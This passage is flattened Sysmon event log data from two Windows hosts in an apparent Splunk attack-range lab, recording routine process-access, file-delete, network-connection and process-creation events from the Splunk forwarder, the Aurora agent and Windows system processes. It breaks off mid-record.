10341000x800000000000000045359Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.671{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000045358Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.607{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3598FDBB794965E0435EB23105EB8AC,SHA256=FF9F5676F0F741E1BA51975EF37D852933EC13361C0B1A511904391208373419,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017780Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:33.025{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50149-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000017779Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:34.159{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E57A-63C7-2502-00000000B002}2008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017778Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:34.159{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017777Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:34.159{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017776Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:34.159{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017775Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:34.159{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017774Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:34.159{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017773Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:34.159{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017772Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:34.159{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017771Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:34.159{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017770Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:34.159{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017769Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:34.159{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E57A-63C7-2502-00000000B002}2008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017768Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:34.159{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E57A-63C7-2502-00000000B002}2008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017767Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:34.161{E5A8D418-E57A-63C7-2502-00000000B002}2008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000045357Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.164{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045356Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.163{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000045385Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:35.774{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=F81999DBB38241347F343188203600CA,SHA256=D728EB60F8999BC9E9E800A04FACB64874F697EB27B5886EEAFA62D3985325E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045384Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:35.696{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3EB3DE6535C272DD5813B2F3895A6DA,SHA256=9D75800B5324736F2A2E806D1A89C9BCAFD4E422FC4E4F42011C0BC485307D19,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045386Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:36.803{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0496390C72174E651B3BEA62CC701AAF,SHA256=D09795D5EA6EBB3F2222ABF06D96788D99912FF797C39855CBC523016A5BA010,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017782Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:36.166{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFA0D76875CD114386A179B2608A3349,SHA256=196940D8797A2BD2685A6EA59C9BAA73035976D40EE78B5EF6FBEEDE4D358307,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045387Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:37.892{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4350BE5E8123261C42DD792CD97E2D48,SHA256=D4CACF272D58B2E4823367C6E8622217EEE4C2F26B635C680039197422394A71,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017783Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:37.233{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8F4372C899EED079D3470DA70186C41,SHA256=D92AA12DCBCB7C92876509AB82563270AE8360193CE081C9CBE5068FEC4C196E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045388Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:38.981{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F18AC44EABC3AC95DD2E846CC11BA5D7,SHA256=45F29792A3BE8CA6169EE5247B31695689CC408AD6507889C9E0EC7A71ECB5CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017784Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:38.325{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50CA7AE495F498A4E5CF01F7DD481840,SHA256=C0CCB9FB74C019C83B557F43757E004056DCE7218A32B1231D36E8C0B592B983,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017785Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:39.406{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74ED1FD71B451BEE24EE80ED4E3C125E,SHA256=680312D4EB19FDF6F7CE48B8792376B2B1E0B25251DE48E8B080F8C7C017E124,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045389Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:36.730{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56421-false10.0.1.12-8000- 354300x800000000000000017787Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:39.031{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50150-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017786Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:40.504{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86940B01B1608BAECFBC687085FCC921,SHA256=001DDF5F5E3ECFDB6173C73DCB916095BD1794CE56F076BD25765F5C4BB2BB8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045390Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:40.073{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20E9B6A11D0E3DFE59212649C78184D1,SHA256=D18E06954B033BFCBBA56B3BA83A2847632D25FF6C12640C68E445F37FC07E6F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017788Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:41.575{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=064DF63D9EC70EC47DFCD444CA8292BA,SHA256=2EA500423E42A9F2AB1C3A2823C1CF62743594FB150EA75F63F75A494D04FFC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045391Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:41.174{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34739C0614265B2FE36E7E4B395DA715,SHA256=92A57F866882DD166F90FCE9A475866A73164FD73B2D82A51343DCA760E018E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017820Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.785{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017819Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.780{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000017818Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:42.779{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program 